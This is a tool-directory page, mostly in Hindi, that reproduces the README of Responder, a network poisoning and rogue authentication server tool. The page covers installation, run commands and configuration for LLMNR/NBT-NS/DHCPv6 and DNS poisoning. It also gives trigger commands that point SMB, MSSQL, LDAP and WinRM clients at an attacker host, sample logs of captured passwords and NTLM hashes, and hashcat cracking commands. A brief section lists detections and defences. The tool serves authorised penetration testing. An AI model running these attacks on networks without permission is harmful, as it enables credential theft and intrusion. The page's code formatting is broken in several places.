Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Responder — Responder एक LLMNR, NBT-NS और MDNS पॉइज़नर है, जिसमें NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP और Basic HTTP प्रमाणीकरण का समर्थन करने वाला अंतर्निहित HTTP/SMB/MSSQL/FTP/LDAP रॉग प्रमाणीकरण सर्वर शामिल है। | Kitploit
उपकरण/GitHubGitHub/lgandx/responder
पासवर्ड क्रैकिंगटोहीDNS और सबडोमेन गणनाशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणDNS फज़िंगरेड टीमिंगDNS विश्लेषण
6.5k8672 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
lgandx/responder

Responder

Responder एक LLMNR, NBT-NS और MDNS पॉइज़नर है, जिसमें NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP और Basic HTTP प्रमाणीकरण का समर्थन करने वाला अंतर्निहित HTTP/SMB/MSSQL/FTP/LDAP रॉग प्रमाणीकरण सर्वर शामिल है।

रिपॉजिटरी देखें

Responder

Python Version License

Responder एक LLMNR, NBT-NS, और MDNS पॉइज़नर है जिसमें HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, और अधिक के लिए बिल्ट-इन रॉग ऑथेंटिकेशन सर्वर हैं। यह NTLMv1/NTLMv2/LMv2, एक्सटेंडेड सिक्योरिटी NTLMSSP, और 15+ प्रोटोकॉल में विभिन्न प्रमाणीकरण विधियों का समर्थन करता है।


Table of Contents

  • अवलोकन
  • नया क्या है
  • स्थापना
  • त्वरित आरंभ
  • नेटवर्क पॉइज़निंग
  • रॉग सर्वर
  • कॉन्फ़िगरेशन
  • macOS
  • समस्या निवारण

अवलोकन

Responder LLMNR, NBT-NS, और MDNS नाम समाधान अनुरोधों का जवाब देकर क्रेडेंशियल्स कैप्चर करता है। जब कोई क्लाइंट किसी अस्तित्वहीन होस्टनाम को हल करने का प्रयास करता है, तो Responder उत्तर देता है, क्लाइंट को हमलावर की मशीन पर निर्देशित करता है जहाँ कई रॉग ऑथेंटिकेशन सर्वर क्रेडेंशियल्स कैप्चर करते हैं। DHCP, DHCPv6 रॉग सर्वर भी शामिल हैं और इन्हें अलग से सक्षम किया जा सकता है।

कैप्चर किया गया डेटा:

  • NetNTLMv1/v2 हैश - हैशकैट/जॉन से क्रैक करने योग्य
  • Kerberos AS-REQ हैश - ऑफलाइन क्रैकिंग (hashcat -m 7500)
  • स्पष्ट पाठ क्रेडेंशियल्स - HTTP बेसिक, FTP, SMTP, IMAP, LDAP, SQL, आदि।
  • चैलेंज-रिस्पांस - CRAM-MD5, DIGEST-MD5

नया क्या है

इस संस्करण में शामिल हैं:

DHCPv6 और DNS संवर्द्धन

  • ✅ DHCPv6 INFORMATION-REQUEST - पूर्ण Windows 10/11 संगतता
  • ✅ डोमेन फ़िल्टरिंग - विशिष्ट डोमेन को लक्ष्य करें (DHCPv6 और DNS)
  • ✅ राउटर विज्ञापन - वैकल्पिक IPv6 नेटवर्क पॉइज़निंग

ईमेल सर्वर अपग्रेड

  • ✅ SMTP STARTTLS - आधुनिक ईमेल क्लाइंट से कैप्चर करें
  • ✅ IMAP STARTTLS - TLS अपग्रेड के साथ पोर्ट 143
  • ✅ IMAPS - पोर्ट 993 पर नेटिव SSL
  • ✅ उन्नत POP3 - बेहतर संगतता

Kerberos सुधार

  • ✅ फोर्स AS-REQ - केरबेरोस प्रमाणीकरण को बाध्य करें।
  • ✅ NTLM फ़ॉलबैक का प्रयास करें - केरबेरोस प्रमाणीकरण लेने के बाद, KDC_ERR_ETYPE_NOSUPP लौटाएं

प्रोटोकॉल संवर्द्धन

  • ✅ MSSQL - SQL सर्वर प्रमाणीकरण कैप्चर
  • ✅ LDAP/LDAPS - निर्देशिका सेवा क्रेडेंशियल्स
  • ✅ RDP - रिमोट डेस्कटॉप प्रमाणीकरण
  • ✅ WinRM - विंडोज रिमोट मैनेजमेंट
  • ✅ DCERPC - विंडोज RPC प्रमाणीकरण

स्थापना

आवश्यकताएँ

  • पायथन 2.7 या पायथन 3.x
  • लिनक्स (Ubuntu, Kali, Debian अनुशंसित)
  • रूट विशेषाधिकार

सिस्टम निर्भरताएँ```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

root@kitploit:~
### Responder स्थापित करें```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

स्थापना की पुष्टि करें```bash

sudo python3 Responder.py --help

root@kitploit:~
---

## त्वरित प्रारंभ

### बुनियादी विषाक्तीकरण```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 हमला```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
### बलपूर्वक HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v

प्रॉक्सी प्रमाणीकरण + रॉग DHCP सक्षम करें```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

root@kitploit:~
## नेटवर्क विषाक्तीकरण

### LLMNR/NBT-NS/MDNS विषाक्तीकरण

**उद्देश्य:** नाम रिज़ॉल्यूशन विफलताओं का जवाब देना

**यह कैसे काम करता है:**
1. क्लाइंट अस्तित्वहीन होस्ट के लिए प्रश्न प्रसारित करता है
2. रिस्पॉन्डर उत्तर देता है: "मैं वह होस्ट हूँ"
3. क्लाइंट हमलावर से जुड़ता है
4. क्रेडेंशियल्स कैप्चर हो जाते हैं

**कॉन्फ़िगरेशन:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

उपयोग:```bash sudo python3 Responder.py -I eth0 -v

root@kitploit:~
---

### DHCPv6 सर्वर

**उद्देश्य:** क्लाइंट को IPv6 के माध्यम से हमलावर के DNS का उपयोग करने के लिए बाध्य करें

**विशेषताएं:**
- ✅ INFORMATION-REQUEST समर्थन (Windows 10/11)
- ✅ SOLICIT/REQUEST समर्थन
- ✅ डोमेन फ़िल्टरिंग (सर्जिकल लक्ष्यीकरण)
- ✅ राउटर विज्ञापन (वैकल्पिक)

**यह कैसे काम करता है:**
1. Windows DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST भेजता है
2. रिस्पॉन्डर प्रतिक्रिया देता है: DNS = हमलावर का IPv6
3. Windows IPv6 DNS को प्राथमिकता देता है
4. सभी DNS क्वेरी → हमलावर
5. DNS विषाक्तीकरण → क्रेडेंशियल कैप्चर

**कॉन्फ़िगरेशन:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

उपयोग:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
**अपेक्षित आउटपुट:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

दुष्ट सर्वर

Responder में 17+ दुष्ट प्रमाणीकरण सर्वर शामिल हैं:

फ़ाइल और नेटवर्क सेवाएँ

SMB सर्वर (पोर्ट 445, 139)

उद्देश्य: फ़ाइल शेयरों से NetNTLM हैश कैप्चर करना

विशेषताएँ:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 हैश कैप्चर
  • ✅ विस्तारित सुरक्षा NTLMSSP
  • ✅ सत्र हस्ताक्षर अक्षम (रिले की अनुमति देता है)

ट्रिगर:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

root@kitploit:~
**कैप्चर किया गया प्रारूप:**```
username::domain:challenge:response:blob

क्रैकिंग:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
SMB = On

FTP सर्वर (पोर्ट 21)

उद्देश्य: क्लियरटेक्स्ट FTP क्रेडेंशियल्स कैप्चर करना

विशेषताएं:

  • ✅ अनाम लॉगिन हनीपॉट
  • ✅ USER/PASS प्रमाणीकरण
  • ✅ क्लियरटेक्स्ट क्रेडेंशियल कैप्चर

ट्रिगर:```bash ftp attacker-ip

Username: anything

Password: anything

root@kitploit:~
**कैप्चर प्रारूप:**```
[FTP] Cleartext: username:password

कॉन्फ़िगरेशन:```ini [Responder Core] FTP = On

root@kitploit:~
---

### डेटाबेस सर्वर

#### MSSQL सर्वर (पोर्ट 1433)

**उद्देश्य:** Microsoft SQL Server प्रमाणीकरण कैप्चर करें

**विशेषताएँ:**
- ✅ SQL Server प्रमाणीकरण
- ✅ विंडोज़ प्रमाणीकरण (NTLM)
- ✅ स्पष्ट टेक्स्ट SQL क्रेडेंशियल्स
- ✅ NetNTLMv2 हैश कैप्चर

**ट्रिगर्स:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

कैप्चर किए गए प्रारूप:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

root@kitploit:~
**विन्यास:**```ini
[Responder Core]
SQL = On

नोट्स:

  • दोनों SQL प्रमाणीकरण और Windows प्रमाणीकरण को कैप्चर करता है
  • SSMS, sqlcmd, ADO.NET कनेक्शन के साथ काम करता है
  • Windows प्रमाणीकरण के माध्यम से डोमेन क्रेडेंशियल्स कैप्चर कर सकता है

ईमेल सर्वर

SMTP सर्वर (पोर्ट 25, 587)

उद्देश्य: ईमेल क्लाइंट प्रमाणीकरण को कैप्चर करना

विशेषताएं:

  • ✅ STARTTLS समर्थन (आधुनिक क्लाइंट)
  • ✅ AUTH PLAIN (स्पष्ट पाठ)
  • ✅ AUTH LOGIN (स्पष्ट पाठ)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

STARTTLS प्रवाह:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

root@kitploit:~
**ट्रिगर्स:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

कैप्चर किए गए प्रारूप:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
SMTP = On

प्रमाणपत्र चेतावनियाँ: स्व-हस्ताक्षरित प्रमाणपत्र चेतावनियाँ सामान्य हैं। क्लाइंट पहले प्रयास को अस्वीकार करते हैं, पुनः प्रयास करते हैं, और सफल होते हैं। क्रेडेंशियल्स फिर भी कैप्चर हो जाते हैं।


IMAP सर्वर (पोर्ट 143)

उद्देश्य: STARTTLS के साथ IMAP प्रमाणीकरण कैप्चर करना

विशेषताएँ:

  • ✅ STARTTLS समर्थन
  • ✅ LOGIN कमांड (क्लियरटेक्स्ट)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLS प्रवाह:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
IMAP = On

IMAPS सर्वर (पोर्ट 993)

उद्देश्य: SSL पर IMAP (मूल एन्क्रिप्शन)

विशेषताएं:

  • ✅ कनेक्शन शुरू से मूल SSL
  • ✅ सभी IMAP प्रमाणीकरण विधियाँ
  • ✅ STARTTLS की आवश्यकता नहीं (पहले से एन्क्रिप्टेड)

यह IMAP से कैसे भिन्न है:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
IMAPS = On

POP3 सर्वर (पोर्ट 110)

उद्देश्य: POP3 ईमेल पुनर्प्राप्ति क्रेडेंशियल कैप्चर करें

विशेषताएं:

  • ✅ USER/PASS प्रमाणीकरण
  • ✅ APOP (MD5 चैलेंज)
  • ✅ स्पष्ट पाठ क्रेडेंशियल कैप्चर

ट्रिगर्स:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
root@kitploit:~
**कैप्चर किया गया प्रारूप:**```
[POP3] USER: username
[POP3] PASS: password

कॉन्फ़िगरेशन:```ini [Responder Core] POP = On

root@kitploit:~
---

### वेब सर्वर

#### HTTP सर्वर (पोर्ट 80)

**उद्देश्य:** वेब प्रमाणीकरण कैप्चर करें

**विशेषताएँ:**
- ✅ NTLM प्रमाणीकरण (NetNTLMv1/v2)
- ✅ बेसिक प्रमाणीकरण (स्पष्ट पाठ)
- ✅ डाइजेस्ट प्रमाणीकरण (MD5)
- ✅ WPAD इंजेक्शन

**ट्रिगर्स:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

बलपूर्वक Basic Auth:```bash sudo python3 Responder.py -I eth0 -b

root@kitploit:~
**कैप्चर किए गए प्रारूप:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

कॉन्फ़िगरेशन:```ini [Responder Core] HTTP = On

root@kitploit:~
---

#### HTTPS सर्वर (पोर्ट 443)

**उद्देश्य:** प्रमाणीकरण कैप्चर के साथ HTTPS

**विशेषताएँ:**
- ✅ SSL/TLS एन्क्रिप्शन
- ✅ सभी HTTP प्रमाणीकरण विधियाँ
- ✅ स्व-हस्ताक्षरित प्रमाणपत्र
- ✅ HTTPS पर WPAD

**कॉन्फ़िगरेशन:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

निर्देशिका और प्रमाणीकरण

केरबेरोस सर्वर (पोर्ट 88)

उद्देश्य: ऑफलाइन क्रैकिंग के लिए AS-REP हैश कैप्चर करें

विशेषताएँ:

  • ✅ AES256-CTS-HMAC-SHA1-96 (etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96 (etype 17)
  • ✅ ARCFOUR-HMAC-MD5 (etype 23)

यह कैसे काम करता है:

  1. क्लाइंट AS-REQ (TGT request) भेजता है
  2. रेस्पॉन्डर: "Pre-authentication required"
  3. क्लाइंट एन्क्रिप्टेड टाइमस्टैम्प के साथ AS-REQ भेजता है
  4. रेस्पॉन्डर एन्क्रिप्टेड टाइमस्टैम्प कैप्चर करता है
  5. hashcat के साथ ऑफलाइन क्रैक करें

क्रैकिंग:```bash hashcat -m 7500 kerberos-asreq.txt wordlist.txt

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
Kerberos = On

LDAP सर्वर (पोर्ट 389)

उद्देश्य: LDAP निर्देशिका प्रमाणीकरण कैप्चर करें

विशेषताएँ:

  • ✅ सरल प्रमाणीकरण (स्पष्ट पाठ)
  • ✅ NTLM प्रमाणीकरण
  • ✅ Active Directory क्वेरीज़

ट्रिगर:```bash

LDAP query

ldapsearch -H ldap://attacker-ip -D "CN=user,DC=corp,DC=local" -w password

Active Directory tools

dsquery user -d attacker-ip

root@kitploit:~
**कैप्चर किए गए प्रारूप:**```
[LDAP] Simple: CN=user,DC=corp,DC=local:password
[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob

कॉन्फ़िगरेशन:```ini [Responder Core] LDAP = On

root@kitploit:~
#### LDAPS सर्वर (पोर्ट 636)

**उद्देश्य:** SSL पर LDAP

**विशेषताएं:**
- ✅ SSL/TLS एन्क्रिप्शन
- ✅ सभी LDAP प्रमाणीकरण विधियाँ

**कॉन्फ़िगरेशन:**```ini
[Responder Core]
LDAP = On

दूरस्थ पहुँच

RDP सर्वर (पोर्ट 3389)

उद्देश्य: रिमोट डेस्कटॉप प्रमाणीकरण कैप्चर करें

विशेषताएँ:

  • ✅ नेटवर्क स्तर प्रमाणीकरण (NLA)
  • ✅ NetNTLMv2 हैश कैप्चर
  • ✅ CredSSP प्रमाणीकरण

ट्रिगर्स:``` Remote Desktop Client:

  • Computer: attacker-ip
  • Username: anything
  • Password: anything
root@kitploit:~
**कैप्चर किया गया प्रारूप:**```
[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob

कॉन्फ़िगरेशन:```ini [Responder Core] RDP = On

root@kitploit:~
**नोट:** डेस्कटॉप सत्र से पहले NLA प्रमाणीकरण कैप्चर करता है।

---

#### WinRM सर्वर (पोर्ट 5985, 5986)

**उद्देश्य:** Windows Remote Management क्रेडेंशियल्स कैप्चर करना

**विशेषताएं:**
- ✅ HTTP (5985) और HTTPS (5986)
- ✅ बेसिक प्रमाणीकरण
- ✅ NTLM प्रमाणीकरण
- ✅ Kerberos प्रमाणीकरण

**ट्रिगर्स:**```powershell
# PowerShell remoting
Enter-PSSession -ComputerName attacker-ip
Invoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }

# WinRM command line
winrm invoke -remote:http://attacker-ip

कैप्चर किए गए फ़ॉर्मेट:``` [WinRM] Basic: DOMAIN\user:password [WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob

root@kitploit:~
**विन्यास:**```ini
[Responder Core]
WINRM = On

बुनियादी ढांचा

DNS Server (Port 53 TCP/UDP)

उद्देश्य: Rogue DNS with domain filtering

विशेषताएँ:

  • ✅ A/AAAA record poisoning
  • ✅ MX record poisoning (email redirection)
  • ✅ SOA records (appear authoritative)
  • ✅ SRV records (Kerberos, LDAP)
  • ✅ SVCB/HTTPS records (modern browsers)
  • ✅ EDNS0 support
  • ✅ Domain filtering

विन्यास:```ini [DHCPv6 Server] ; DNS uses same domain filter as DHCPv6 DHCPv6_Domain = corp.local

root@kitploit:~
**यह कैसे काम करता है:**```
Query: mail.corp.local
Response: 192.168.1.100 (attacker)
Client connects to attacker's SMTP
Credentials captured!

समर्थित रिकॉर्ड प्रकार:

  • A (IPv4) - हमलावर पर पुनर्निर्देशित करें
  • AAAA (IPv6) - हमलावर पर पुनर्निर्देशित करें
  • MX (मेल) - ईमेल सर्वर विषाक्तीकरण
  • SRV (सेवाएं) - केरबेरोस, LDAP, आदि।
  • SOA (प्राधिकरण) - आधिकारिक के रूप में प्रकट हों
  • TXT (पाठ) - SPF रिकॉर्ड
  • SVCB/HTTPS (सेवा बाइंडिंग) - आधुनिक ब्राउज़र

डोमेन फ़िल्टरिंग उदाहरण:``` DHCPv6_Domain = corp.local

mail.corp.local → POISONED ✅ dc01.corp.local → POISONED ✅ google.com → IGNORED (normal DNS)

root@kitploit:~
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
DNS = On

DCERPC Server (Port 135)

उद्देश्य: Windows RPC प्रमाणीकरण कैप्चर करें

विशेषताएं:

  • ✅ NTLM प्रमाणीकरण
  • ✅ Windows सेवा गणना
  • ✅ NetNTLMv2 कैप्चर

ट्रिगर्स:``` Windows services querying RPC endpoint mapper WMI queries Remote registry access

root@kitploit:~
**कैप्चर किया गया प्रारूप:**```
[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob

कॉन्फ़िगरेशन:```ini [Responder Core] DCERPC = On

root@kitploit:~
---

## कॉन्फ़िगरेशन

### मुख्य कॉन्फ़िगरेशन फ़ाइल

`Responder.conf` को संपादित करें:```ini
[Responder Core]
; === Network Services ===
SQL = On        # MSSQL (port 1433)
SMB = On        # SMB (ports 445, 139)
RDP = On        # Remote Desktop (port 3389)
Kerberos = On   # Kerberos (port 88)
FTP = On        # FTP (port 21)
POP = On        # POP3 (port 110)
SMTP = On       # SMTP with STARTTLS (port 25/587)
IMAP = On       # IMAP with STARTTLS (port 143)
IMAPS = On      # IMAPS with SSL (port 993)
HTTP = On       # HTTP (port 80)
HTTPS = On      # HTTPS (port 443)
DNS = On        # DNS (port 53)
LDAP = On       # LDAP/LDAPS (ports 389/636)
DCERPC = On     # Windows RPC (port 135)
WINRM = On      # Windows Remote Management (ports 5985/5986)

; === Poisoners ===
LLMNR = On      # Link-Local Multicast Name Resolution
NBTNS = On      # NetBIOS Name Service
MDNS = On       # Multicast DNS
DHCP = Off      # DHCP (IPv4) - use with caution
DHCPv6 = On     # DHCPv6 (IPv6) - use with more caution

; === Settings ===
SessionLog = On
LogToFile = On
Verbose = Yes
Database = Responder.db

; === SSL Certificates ===
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

[HTTP Server]
HtmlFilename = files/AccessDenied.html

[DHCPv6 Server]
; Target specific domain 
DHCPv6_Domain = corp.local

; Send Router Advertisements (use with caution)
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

कमांड-लाइन विकल्प

मूल उपयोग```bash

sudo python3 Responder.py [options]

root@kitploit:~
### आवश्यक तर्क

| Option | Description |
|--------|-------------|
| `-I eth0, --interface=eth0` | उपयोग करने के लिए नेटवर्क इंटरफ़ेस (सभी इंटरफ़ेस के लिए 'ALL' का उपयोग करें) |

### विषाक्तीकरण विकल्प

| Option | Description |
|--------|-------------|
| `-A, --analyze` | विश्लेषण मोड - बिना प्रतिक्रिया दिए NBT-NS, MDNS, LLMNR अनुरोध देखें |
| `-w, --wpad` | WPAD रॉग प्रॉक्सी सर्वर प्रारंभ करें (डिफ़ॉल्ट: बंद) |
| `-F, --ForceWpadAuth` | wpad.dat प्राप्ति पर NTLM/बेसिक प्रमाणीकरण बाध्य करें (पुराने नेटवर्क)|
| `-P, --ProxyAuth` | प्रॉक्सी के लिए NTLM/बेसिक प्रमाणीकरण बाध्य करें (अत्यधिक प्रभावी) |

### DHCP/DHCPv6 विकल्प

| Option | Description |
|--------|-------------|
| `-d, --DHCP` | WPAD इंजेक्शन के साथ DHCP प्रसारण प्रतिक्रियाएँ सक्षम करें (IPv4) |
| `-D, --DHCP-DNS` | WPAD के बजाय DHCP प्रतिक्रिया में DNS सर्वर इंजेक्ट करें |
| `--dhcpv6` | DHCPv6 विषाक्तीकरण सक्षम करें (SOLICIT संदेशों का उत्तर देता है) |

### IP विषाक्तीकरण विकल्प

| Option | Description |
|--------|-------------|
| `-e 10.0.0.22, --externalip=10.0.0.22` | दूसरे IPv4 पते से अनुरोधों को विषाक्त करें |
| `-6 ADDR, --externalip6=ADDR` | दूसरे IPv6 पते से अनुरोधों को विषाक्त करें |
| `-i 10.0.0.21, --ip=10.0.0.21` | उपयोग करने के लिए स्थानीय IP (केवल macOS) |

### प्रमाणीकरण विकल्प

| Option | Description |
|--------|-------------|
| `-b, --basic` | HTTP बेसिक प्रमाणीकरण लौटाएँ (डिफ़ॉल्ट: NTLM) |
| `--lm` | LM हैशिंग डाउनग्रेड बाध्य करें (Windows XP/2003) |
| `--disable-ess` | विस्तारित सुरक्षा NTLMSSP डाउनग्रेड बाध्य करें |

### उन्नत विकल्प

| Option | Description |
|--------|-------------|
| `-u HOST:PORT, --upstream-proxy=HOST:PORT` | रॉग WPAD के लिए अपस्ट्रीम HTTP प्रॉक्सी |
| `-t 1e, --ttl=1e` | विषाक्त उत्तरों के लिए Windows TTL बदलें (हेक्स: 30s=1e, या 'random') |
| `-N NAME, --AnswerName=NAME` | LLMNR उत्तरों के लिए विहित नाम (Kerberos रिले के लिए उपयोगी) |
| `-E, --ErrorCode` | STATUS_LOGON_FAILURE लौटाएँ (WebDAV प्रमाणीकरण कैप्चर सक्षम करता है) |

### आउटपुट विकल्प

| Option | Description |
|--------|-------------|
| `-v, --verbose` | विस्तार बढ़ाएँ (अनुशंसित) |
| `-Q, --quiet` | शांत मोड - विषाक्तीकरण आउटपुट अक्षम करें |

### जानकारी

| Option | Description |
|--------|-------------|
| `--version` | प्रोग्राम संस्करण दिखाएँ और बाहर निकलें |
| `-h, --help` | सहायता संदेश दिखाएँ और बाहर निकलें |

---

### भंडारण स्थान```
Responder.db                    # SQLite database
logs/
├── HTTP-NTLMv2-<IP>.txt       # HTTP NetNTLMv2 hashes
├── SMB-NTLMv2-<IP>.txt        # SMB NetNTLMv2 hashes
├── MSSQL-NTLMv2-<IP>.txt      # MSSQL NetNTLMv2 hashes
├── Kerberos-AES-<IP>.txt      # Kerberos AS-REP hashes
├── SMTP-Cleartext-<IP>.txt    # SMTP cleartext credentials
├── IMAP-NTLMv2-<IP>.txt       # IMAP NetNTLMv2 hashes
├── FTP-Cleartext-<IP>.txt     # FTP cleartext credentials
├── LDAP-Cleartext-<IP>.txt    # LDAP cleartext credentials
├── RDP-NTLMv2-<IP>.txt        # RDP NetNTLMv2 hashes
└── WinRM-NTLMv2-<IP>.txt      # WinRM NetNTLMv2 hashes

डेटाबेस क्वेरी```bash

sqlite3 Responder.db

Show tables

.tables

Show all captured hashes

SELECT * FROM hashes;

Export to CSV

.mode csv .output hashes.csv SELECT * FROM hashes; .quit

root@kitploit:~
---

### OpSec संबंधी विचार

**पहचान संकेतक:**
- असामान्य LLMNR/NBT-NS प्रतिक्रियाएं
- नकली DHCP/DHCPv6 सर्वर
- अमान्य Kerberos पूर्व-प्रमाणीकरण अनुरोध
- स्व-हस्ताक्षरित SSL प्रमाणपत्र
- एकाधिक प्रमाणीकरण विफलताएं
- संदिग्ध DNS प्रतिक्रियाएं

**रक्षात्मक उपाय:**
- GPO के माध्यम से MDNS/LLMNR/NBT-NS अक्षम करें
- स्विच पर DHCP स्नूपिंग सक्षम करें
- IPv6 RA गार्ड सक्षम करें
- DHCPv6 गार्ड सक्षम करें
- नकली DHCPv6 सर्वरों की निगरानी करें

---

## macOS

Responder macOS पर काम करता है लेकिन आपके स्थानीय IP पते को निर्दिष्ट करने के लिए `-i` फ़्लैग की आवश्यकता होती है। macOS इंटरफ़ेस बाइंडिंग के लिए Linux पर उपयोग किए जाने वाले `SO_BINDTODEVICE` सॉकेट विकल्प का समर्थन नहीं करता है।

### लॉन्चर स्क्रिप्ट का उपयोग

शामिल `macOS_Launcher.sh` स्वचालित रूप से सेवा विरोधों को संभालता है:```bash
sudo ./macOS_Launcher.sh -I en0

लॉन्चर निम्न कार्य करेगा:

  • इंटरफ़ेस से आपका IP स्वतः पहचानें (या ओवरराइड करने के लिए -i पास करें)
  • SIP की स्थिति जांचें और सीमाएँ रिपोर्ट करें
  • यदि SIP अक्षम है, तो विरोधाभासी macOS सेवाओं (Kerberos, mDNSResponder, SMB, NetBIOS) को रोकें
  • यदि SIP सक्षम है, तो पोर्ट विरोधाभासों की रिपोर्ट करें
  • जब Responder बाहर निकलता है (Ctrl+C पर भी), सभी रोकी गई सेवाओं को पुनर्स्थापित करें

सीधे चलाना```bash

Find your IP

ipconfig getifaddr en0

Run with explicit IP

sudo python3 Responder.py -I en0 -i 192.168.1.100

root@kitploit:~
### सिस्टम इंटीग्रिटी प्रोटेक्शन (SIP)

SIP सक्षम होने पर (डिफ़ॉल्ट), macOS उन सिस्टम सेवाओं को रोकने से रोकता है जो Responder को आवश्यक पोर्ट से बाइंड होती हैं। आपके पास तीन विकल्प हैं:

1. **लॉन्चर स्क्रिप्ट का उपयोग करें** — यह संघर्षों की रिपोर्ट करेगा और उपलब्ध के साथ जारी रखेगा
2. **`Responder.conf` में विरोधी मॉड्यूल्स को अक्षम करें** (जैसे, `SMB = Off`, `DNS = Off`)
3. **पूर्ण कार्यक्षमता के लिए SIP अक्षम करें** (देखें [Apple का दस्तावेज़ीकरण](https://developer.apple.com/documentation/security/disabling-and-enabling-system-integrity-protection))

---

## समस्या निवारण

### सामान्य समस्याएँ

**अनुमति अस्वीकृत:**```bash
sudo python3 Responder.py -I eth0

इंटरफ़ेस नहीं मिला:```bash ip link show sudo python3 Responder.py -I wlan0

root@kitploit:~
**पोर्ट पहले से उपयोग में है:**```bash
sudo netstat -tulpn | grep 445
sudo systemctl stop smbd nmbd

DHCPv6 काम नहीं कर रहा:```bash

Enable IPv6

sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0

Verify

sysctl net.ipv6.conf.all.disable_ipv6

root@kitploit:~
**कोई हैश कैप्चर नहीं हुआ:**```bash
# Verify servers running
sudo python3 Responder.py -I eth0 -v

# Check firewall
sudo iptables -L

# Monitor traffic
sudo tcpdump -i eth0 port 445 or port 88 or port 389

डीबग मोड```bash

Very verbose output

sudo python3 Responder.py -I eth0 -vv

Tail logs

tail -f logs/Responder-Session.log

Network monitoring

